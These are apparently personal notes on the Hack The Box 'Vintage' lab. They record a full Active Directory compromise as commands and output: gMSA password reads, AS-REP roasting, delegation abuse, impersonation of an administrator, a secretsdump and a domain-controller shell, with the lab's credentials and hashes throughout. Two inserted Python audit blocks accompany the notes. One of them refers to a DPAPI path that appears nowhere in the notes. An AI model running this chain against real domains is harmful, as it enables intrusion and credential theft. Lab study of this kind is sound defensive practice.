Here are my notes for the Vintage box from Hack The Box
VINTAGE: 10.129.165.43
As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123
P.Rosa:Rosaisbest123
Rosaisbest123:8C241D5FE65F801B408C96776B38FBA2
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
nxc ldap dc01.vintage.htb -k -u P.Rosa -p Rosaisbest123 --dns-tcp --dns-server 10.129.165.43 --bloodhound --collection All
bloodhound-python -k -c All -u P.Rosa -p 'Rosaisbest123' -d vintage.htb --dns-tcp -ns 10.129.165.43
bloodhound-python -k -c All -u 'FS01$' -p 'fs01' -d vintage.htb --dns-tcp -ns 10.129.165.43
BLOODHOUND DATA: FS01$
rbcd.py -delegate-from 'FS01$' -delegate-to 'DNSADMINS' -action 'write' 'vintage.htb/FS01$:fs01'
net rpc password "SVC_SQL" "newP@ssword2022" -U "vintage.htb"/"FS01$"%"fs01" -S "10.129.165.43"
bloodyAD --host "10.129.165.43" -d "vintage.htb" -u "FS01$" -p "fs01" set password "svc_sql" "newP@ssword2022" -k
FS01$ -> Members of -> Domain Computers@Vintage.HTB Group -> ReadGMSAPassword -> GMSA01$:
bloodyAD --host "dc01.vintage.htb" --dc-ip 10.129.165.43 -d "vintage.htb" -u "FS01$" -p "fs01" -k get object 'GMSA01$' --attr msDS-ManagedPassword
distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:7dc430b95e17ed6f817f69366f35be06
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# crackmapexec ldap dc01.vintage.htb -k -u 'GMSA01$' -H '7dc430b95e17ed6f817f69366f35be06'
LDAP dc01.vintage.htb 389 dc01.vintage.htb [*] x64 (name:dc01.vintage.htb) (domain:vintage.htb) (signing:True) (SMBv1:False)
LDAP dc01.vintage.htb 389 dc01.vintage.htb [+] vintage.htb\GMSA01$:7dc430b95e17ed6f817f69366f35be06
GMSA01$ -> GenericWrite & Add Self -> ServiceManagers@VINTAGE.HTB group:
getTGT.py vintage.htb/'GMSA01$' -hashes aad3b435b51404eeaad3b435b51404ee:7dc430b95e17ed6f817f69366f35be06
export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/'GMSA01$.ccache'
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.165.43 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.165.43 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
[+] P.Rosa added to SERVICEMANAGERS
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.165.43 -k add groupMember "SERVICEMANAGERS" "GMSA01$"
[+] GMSA01$ added to SERVICEMANAGERS
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.101.218 -u 'GMSA01$' -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" 'GMSA01$'
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.101.218 -u 'GMSA01$' -k get object "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member
distinguishedName: CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB
member: CN=P.Rosa,CN=Users,DC=vintage,DC=htb; CN=C.Neri,CN=Users,DC=vintage,DC=htb; CN=G.Viola,CN=Users,DC=vintage,DC=htb; CN=L.Bianchi,CN=Users,DC=vintage,DC=htb; CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
#Then update the GMSA01$ ticket as usual:
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# getTGT.py vintage.htb/'GMSA01$' -hashes aad3b435b51404eeaad3b435b51404ee:7dc430b95e17ed6f817f69366f35be06
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in GMSA01$.ccache
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/'GMSA01$.ccache'
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# klist
Ticket cache: FILE:/home/kali/HTB/VINTAGE/10.129.165.43/GMSA01$.ccache
Default principal: GMSA01$@VINTAGE.HTB
Valid starting Expires Service principal
01/04/2025 11:50:39 01/04/2025 21:50:39 krbtgt/VINTAGE.HTB@VINTAGE.HTB
renew until 01/05/2025 11:50:39
ServiceManager@VINTAGE.HTB Group -> GenericAll -> svc_sql & svc_ark & svc_ldap users:
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.165.43 -k set password "svc_sql" "Password@9876" #NOPE.
Make sure to update the GMSA01$ ticket after modifying:
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# getTGT.py vintage.htb/'GMSA01$' -hashes aad3b435b51404eeaad3b435b51404ee:7dc430b95e17ed6f817f69366f35be06
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in GMSA01$.ccache
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/'GMSA01$.ccache'
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# klist
Ticket cache: FILE:/home/kali/HTB/VINTAGE/10.129.165.43/GMSA01$.ccache
Default principal: GMSA01$@VINTAGE.HTB
Valid starting Expires Service principal
01/04/2025 11:50:39 01/04/2025 21:50:39 krbtgt/VINTAGE.HTB@VINTAGE.HTB
renew until 01/05/2025 11:50:39
BloodyAD Way:
# Enable DONT_REQ_PREAUTH for ASREPRoast:
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add uac svc_sql DONT_REQ_PREAUTH
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH
# Disable ACCOUNTDISABLE:
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k remove uac SVC_SQL -f ACCOUNTDISABLE
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k remove uac SVC_ARK -f ACCOUNTDISABLE
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k remove uac SVC_LDAP -f ACCOUNTDISABLE
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k set object "SVC_SQL" servicePrincipalName -v "cifs/fake" #This will be useful for later.
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.166.76 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.166.76 -k remove uac SVC_SQL -f ACCOUNTDISABLE
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.166.76 -k set object "SVC_SQL" servicePrincipalName -v "cifs/fake"
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k set object "SVC_SQL" servicePrincipalName -v "cifs/fake"
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k remove uac SVC_SQL -f ACCOUNTDISABLE
getTGT.py vintage.htb/'GMSA01$' -hashes aad3b435b51404eeaad3b435b51404ee:7dc430b95e17ed6f817f69366f35be06
export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/'GMSA01$.ccache'
GetNPUsers.py -k -dc-ip 10.129.101.218 vintage.htb/ -usersfile users.txt -format hashcat
python3 targetedKerberoast.py -d vintage.htb --dc-host dc01.vintage.htb -k --no-pass -v
#Both ways require an updated Kerberos ticket after the modification.
Got svc_ldap, svc_sql and svc_ark hashes !
svc_sql:Zer0the0ne
svc_sql cracked but not the other two.
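As an added defensive check (not part of these notes): the userAccountControl changes made above (DONT_REQ_PREAUTH added, ACCOUNTDISABLE removed) are exactly the state an AD audit should alert on. This Python decodes userAccountControl bits, flags enabled accounts that do not require Kerberos pre-authentication or a password, and builds the LDAP filter a defender would use to find them; the sample entries are constructed, not pulled from the box.

```python
# Added defensive check, not part of the original notes: decode userAccountControl
# and flag accounts in the state the commands above produce (pre-auth disabled on an
# enabled account). Sample entries below are constructed.

UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
LDAP_BIT_AND = "1.2.840.113556.1.4.803"   # LDAP_MATCHING_RULE_BIT_AND


def decode_uac(value):
    """Return the names of the known flag bits set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def is_enabled(value):
    return not value & 0x0002


def ldap_filter_asrep():
    """LDAP filter matching what GetNPUsers.py picks up: pre-auth disabled AND account enabled."""
    return ("(&(userAccountControl:%s:=%d)(!(userAccountControl:%s:=%d)))"
            % (LDAP_BIT_AND, 0x400000, LDAP_BIT_AND, 0x0002))


def audit(entries):
    """entries: {sAMAccountName: userAccountControl}. Returns [(account, finding), ...]."""
    findings = []
    for sam, uac in entries.items():
        if not is_enabled(uac):
            continue  # a disabled account can neither be roasted nor log on
        if uac & 0x400000:
            findings.append((sam, "DONT_REQ_PREAUTH set on enabled account (AS-REP roastable)"))
        if uac & 0x0020:
            findings.append((sam, "PASSWD_NOTREQD set on enabled account (weak/empty password allowed)"))
        if uac & 0x80000 and not uac & 0x2000:
            findings.append((sam, "unconstrained delegation on a non-DC account"))
    return findings


# Constructed sample: the three service accounts after the bloodyAD changes above, plus a
# pre-Windows 2000 style computer account (4128 = WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD).
SAMPLE = {
    "svc_sql":  0x200 | 0x400000,         # enabled, pre-auth disabled       -> finding
    "svc_ark":  0x200 | 0x400000 | 0x2,   # pre-auth disabled, still disabled -> nothing
    "svc_ldap": 0x200 | 0x10000,          # enabled, password never expires   -> nothing
    "FS01$":    0x1000 | 0x20,            # pre-2000 computer                 -> PASSWD_NOTREQD
    "DC01$":    0x2000 | 0x80000,         # DC: unconstrained delegation is expected
}

if __name__ == "__main__":
    for sam, finding in audit(SAMPLE):
        print("%-10s %s  [%s]" % (sam, finding, ",".join(decode_uac(SAMPLE[sam]))))
    print("LDAP filter:", ldap_filter_asrep())
```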
c.neri_adm -> GenericWrite & AddSelf -> DELEGATEDADMINS@VINTAGE.HTB Group:
getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -dc-ip 10.129.101.218
getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -dc-ip 10.129.166.76
export KRB5CCNAME=/home/kali/HTB/VINTAGE/c.neri_adm.ccache
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k add groupMember "DELEGATEDADMINS" "P.Rosa"
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k add groupMember "DELEGATEDADMINS" "SVC_SQL"
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.166.76 -k add groupMember "DELEGATEDADMINS" "SVC_SQL"
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.166.76 -u 'c.neri_adm' -k get object "CN=DELEGATEDADMINS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member
getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -dc-ip 10.129.166.76
export KRB5CCNAME=/home/kali/HTB/VINTAGE/c.neri_adm.ccache
getTGT.py vintage.htb/svc_sql:Zer0the0ne -dc-ip 10.129.231.205
getTGT.py vintage.htb/svc_sql:Zer0the0ne -dc-ip 10.129.166.76
export KRB5CCNAME=/home/kali/HTB/VINTAGE/svc_sql.ccache
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.166.76 -k 'vintage.htb/svc_sql:Zer0the0ne'
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.231.205 -k 'vintage.htb/svc_sql:Zer0the0ne'
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE]
└─# impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.231.205 -k 'vintage.htb/svc_sql:Zer0the0ne'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Impersonating L.BIANCHI_ADM
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
impacket-secretsdump -k -no-pass dc01.vintage.htb
wmiexec.py -k -no-pass dc01.vintage.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
vintage\l.bianchi_adm
C:\>hostname
dc01
[SNIP]
C:\>whoami /groups
[SNIP]
Mandatory Label\High Mandatory Level Label S-1-16-12288
HIGH-PRIV ADMIN SHELL !
C:\Users\Administrator\Desktop>whoami
vintage\l.bianchi_adm
C:\Users\Administrator\Desktop>hostname
dc01
C:\Users\Administrator\Desktop>type root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
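As an added defensive audit (not from these notes): the AllowedToAct edge that lets DELEGATEDADMINS members obtain a ticket to DC01 lives in the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor on DC01$, and the same descriptor format (msDS-GroupMSAMembership) decides who may read GMSA01$'s password via ReadGMSAPassword. This Python decodes such a self-relative security descriptor and lists the principals its DACL grants access to; the descriptor bytes, SID-to-name map and group RID are constructed placeholders (only the domain SID appears in these notes, in the DPAPI Protect path).

```python
import struct

# Added example, not from the original notes: decode the DACL of a self-relative
# security descriptor such as msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD) or
# msDS-GroupMSAMembership (gMSA password readers). Sample data is constructed.

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
FULL_CONTROL = 0x000F01FF          # mask written by RBCD tooling


def parse_sid(buf, off):
    """Decode a binary SID at buf[off]; return (string form, byte size)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d%s" % (rev, authority, "".join("-%d" % s for s in subs)), 8 + 4 * count


def allowed_sids(sd):
    """Return [(sid, mask)] for every ACCESS_ALLOWED ACE in the DACL of a self-relative SD."""
    rev, _sbz, control, _own, _grp, _sacl, o_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or o_dacl == 0:
        return []
    _arev, _sbz1, _size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, o_dacl)
    off, out = o_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = parse_sid(sd, off + 8)
            out.append((sid, mask))
        off += ace_size
    return out


def audit_rbcd(sd, names, target):
    """Findings: who may act on behalf of other identities to `target`; groups are called out."""
    findings = []
    for sid, mask in allowed_sids(sd):
        name = names.get(sid, sid)
        kind = "GROUP" if name.endswith("(group)") else "principal"
        findings.append("%s may act on behalf of other identities to %s [%s, mask 0x%X]"
                        % (name, target, kind, mask))
    return findings


# --- builder for the constructed sample (the shape RBCD tooling writes) ---
def make_sid(sid_str):
    parts = [int(p) for p in sid_str.split("-")[1:]]
    rev, auth, subs = parts[0], parts[1], parts[2:]
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def make_sd(allowed, owner="S-1-5-32-544"):
    aces = b"".join(struct.pack("<BBHI", 0, 0, 8 + len(make_sid(s)), FULL_CONTROL) + make_sid(s)
                    for s in allowed)
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed), 0) + aces
    own = make_sid(owner)
    hdr = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 20, 20, 0, 20 + len(own))
    return hdr + own + dacl


DOMAIN = "S-1-5-21-4024337825-2033394866-2055507597"   # domain SID from the Protect path in these notes
GROUP_RID = 9999                                        # placeholder: the real group RID is not in the notes
NAMES = {"%s-%d" % (DOMAIN, GROUP_RID): "DELEGATEDADMINS (group)"}

if __name__ == "__main__":
    sd = make_sd(["%s-%d" % (DOMAIN, GROUP_RID)])
    for line in audit_rbcd(sd, NAMES, "DC01$"):
        print(line)
```

A group, rather than a single service account, being allowed to act on a domain controller is the finding a defender wants from this descriptor.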
#When working with Kerberos tickets, any change made on the server while holding a ticket requires requesting a new ticket before it takes effect for further AD attacks.
#THE REST BELOW IS TRIAL AND ERROR; most of it likely doesn't work.
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.166.76 -u 'c.neri_adm' -k add dcsync administrator
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.166.76 -u 'c.neri_adm' get object 'DC=vintage,DC=htb' --attr ms-DS-MachineAccountQuota
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.166.76 -u 'c.neri_adm' add rbcd DC01$ c.neri_adm
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.231.205 -k set object "SVC_SQL" servicePrincipalName -v "cifs/fake"
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.231.205 -u 'c.neri_adm' -k get object "CN=DELEGATEDADMINS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.129.101.218 -k set object "P.Rosa" servicePrincipalName -v "cifs/fake"
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.129.101.218 -u 'c.neri_adm' -k get object "CN=DELEGATEDADMINS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member
getTGT.py vintage.htb/P.Rosa:Rosaisbest123 -dc-ip 10.129.101.218
export KRB5CCNAME=/home/kali/HTB/VINTAGE/P.Rosa.ccache
c.neri_adm -> MemberOf -> DELEGATEDADMINS@VINTAGE.HTB Group -> AllowedToAct -> DC01.VINTAGE.HTB:
getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -dc-ip 10.129.101.218
export KRB5CCNAME=/home/kali/HTB/VINTAGE/c.neri_adm.ccache
klist
getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'
impacket-getST -spn cifs/dc01.vintage.htb -impersonate Administrator -dc-ip 10.129.101.218 -k 'vintage/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312'
impacket-getST -spn cifs/dc01.vintage.htb -impersonate L.BIANCHI_ADM -dc-ip 10.129.101.218 -k 'vintage/p.rosa:Rosaisbest123'
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.231.205 -k 'vintage.htb/svc_sql:Zer0the0ne'
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.166.76 -k 'vintage.htb/svc_sql:Zer0the0ne'
impacket-getST -spn ldap/dc01.vintage.htb -impersonate dc01 -dc-ip 10.129.166.76 -k 'vintage/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312'
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.129.231.205 -k 'vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312'
impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'
impacket-getST -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/dc01.vintage.htb" 'vintage.htb'/'c.neri_adm'
impacket-getST -k -no-pass -u2u -impersonate "L.BIANCHI_ADM" -spn "cifs/dc01.vintage.htb" 'vintage.htb'/'c.neri_adm'
export KRB5CCNAME=./Administrator.ccache
getTGT.py -hashes :$(pypykatz crypto nt 'Uncr4ck4bl3P4ssW0rd0312') 'vintage.htb'/'c.neri_adm'
describeTicket.py 'c.neri_adm.ccache' | grep 'Ticket Session Key'
python3 /usr/share/doc/python3-impacket/examples/describeTicket.py 'c.neri_adm.ccache' | grep 'Ticket Session Key'
[*] Ticket Session Key : 68c3776d29a520820e5da428321b194b
changepasswd.py -newhashes :68c3776d29a520820e5da428321b194b 'vintage.htb'/'c.neri_adm':'Uncr4ck4bl3P4ssW0rd0312'@'vintage.htb'
export KRB5CCNAME='adm_prju.ccache'
impacket-getST -u2u -impersonate ""_admin"" -spn ""cifs/mucdc.heron.vl"" -k -no-pass 'heron.vl'/'adm_prju'
export KRB5CCNAME='_admin@cifs_mucdc.heron.vl@HERON.VL.ccache'
crackmapexec smb 10.10.165.181 --use-kcache --ntds
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-03 15:15:59Z)
Wrong Account for some reason for P.Rosa.
NO ASREPROASTING.
getTGT.py -dc-ip 10.129.165.43 -hashes :8C241D5FE65F801B408C96776B38FBA2 vintage.htb/P.Rosa
getTGT.py vintage.htb/P.Rosa:Rosaisbest123 -dc-ip 10.129.165.43
export KRB5CCNAME=/home/kali/HTB/VINTAGE/10.129.165.43/P.Rosa.ccache
GetUserSPNs.py vintage.htb/P.Rosa:Rosaisbest123 -dc-ip dc01.vintage.htb -request -k -debug
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket
[+] Connecting to dc01.vintage.htb, port 389, SSL False
[+] Using Kerberos Cache: /home/kali/HTB/VINTAGE/10.129.165.43/P.Rosa.ccache
[+] SPN LDAP/DC01.VINTAGE.HTB@VINTAGE.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/VINTAGE.HTB@VINTAGE.HTB
[+] Using TGT from cache
[+] Trying to connect to KDC at dc01.vintage.htb
[+] Total of records returned 3
No entries found!
#NOPE, what a waste of time !
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# rpcclient 10.129.165.43 -U "P.Rosa" -c "enumdomusers;quit"
Password for [WORKGROUP\P.Rosa]:
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# rpcclient 10.129.165.43 -U "vintage.htb\P.Rosa" -c "enumdomusers;quit"
Password for [VINTAGE.HTB\P.Rosa]:
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[/home/kali/HTB/VINTAGE/10.129.165.43]
└─# rpcclient 10.129.165.43 -U "vintage.htb\P.Rosa"
Password for [VINTAGE.HTB\P.Rosa]:
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
#NOPE.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
ldapsearch -H ldap://10.129.165.43 -x -W -D "p.rosa@vintage.htb" -b "dc=vintage,dc=htb" '(objectClass=person)' > ldap-people
#WORKS !
No Password Shown.
No Interesting Description.
ldapsearch -H ldap://10.129.165.43 -x -W -D "p.rosa@vintage.htb" -b "dc=vintage,dc=htb" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}' > users.txt
ldapsearch -LLL -H ldap://dc01.vintage.htb -x -W -D "p.rosa@vintage.htb" -Y GSSAPI -b "DC=vintage,DC=htb" -N -o ldif-wrap=no -E '!1.2.840.113556.1.4.801=::MAMCAQc=' "(&(objectClass=*))" | tee ldap.txt
poetry run pre2k auth -k -u p.rosa -p Rosaisbest123 -d vintage.htb -dc-ip 10.129.165.43
Pre-Windows 2000 computer accounts (pre2k):
Got the computer accounts of the AD network? Consider checking them for pre-Windows 2000 passwords, either authenticated or unauthenticated. Either way, consider using both options.
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pre2k]
└─# cat computers.txt
DC01$
FS01$
┌──(root㉿kali)-[/home/kali/Kali-Tools/attacktive-directory-tools/pre2k]
└─# poetry run pre2k unauth -d vintage.htb -dc-ip 10.129.165.43 -inputfile computers.txt
[13:07:38] INFO Testing started at 2025-01-03 13:07:38
[13:07:38] INFO Using 10 threads
[13:07:39] INFO VALID CREDENTIALS: vintage.htb\FS01$:fs01
nxc ldap dc01.vintage.htb -u 'FS01$' -p fs01 -d vintage.htb -k
LDAP dc01.vintage.htb 389 dc01.vintage.htb [*] x64 (name:dc01.vintage.htb) (domain:vintage.htb) (signing:True) (SMBv1:False)
LDAP dc01.vintage.htb 389 dc01.vintage.htb [+] vintage.htb\FS01$:fs01
445/tcp open microsoft-ds?
NT_STATUS_NOT_SUPPORTED for P.Rosa for some reason.
crackmapexec smb 10.129.165.43 -k -d vintage.htb -u norm_users.txt -p norm_pass.txt --no-bruteforce --shares
SMB 10.129.165.43 445 10.129.165.43 [*] x64 (name:10.129.165.43) (domain:vintage.htb) (signing:True) (SMBv1:False)
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\M.Rossi: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\R.Verdi: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\L.Bianchi: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\G.Viola: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\C.Neri: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\P.Rosa: KDC_ERR_S_PRINCIPAL_UNKNOWN
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\C.Neri_adm: KDC_ERR_PREAUTH_FAILED
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\L.Bianchi_adm: KDC_ERR_PREAUTH_FAILED
This suggests that NTLM is disabled and authentication is only possible via kerberos. We can spray using crackmapexec and kerberos by adding the -k flag as follows:
SMB 10.129.165.43 445 10.129.165.43 [-] vintage.htb\P.Rosa: KDC_ERR_S_PRINCIPAL_UNKNOWN
IT'S VALID, but we have to do it the Kerberos way from now on.
smbclient.py -k vintage.htb/P.Rosa:Rosaisbest123@dc01.vintage.htb -dc-ip dc01.vintage.htb
#WORKS !
NO Interesting file in SYSVOL.
nxc smb dc01.vintage.htb -k -u P.Rosa -p Rosaisbest123
netexec smb dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -d vintage.htb -k --shares
crackmapexec smb dc01.vintage.htb -k -d vintage.htb -u norm_users.txt -p Zer0the0ne
crackmapexec smb dc01.vintage.htb -k -d vintage.htb -u norm_users.txt -p Zer0the0ne --continue-on-success
SMB dc01.vintage.htb 445 dc01.vintage.htb [*] x64 (name:dc01.vintage.htb) (domain:vintage.htb) (signing:True) (SMBv1:False)
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\M.Rossi: KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\R.Verdi: KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\L.Bianchi: KDC_ERR_PREAUTH_FAILED
SMB dc01.vintage.htb 445 dc01.vintage.htb [-] vintage.htb\G.Viola: KDC_ERR_PREAUTH_FAILED
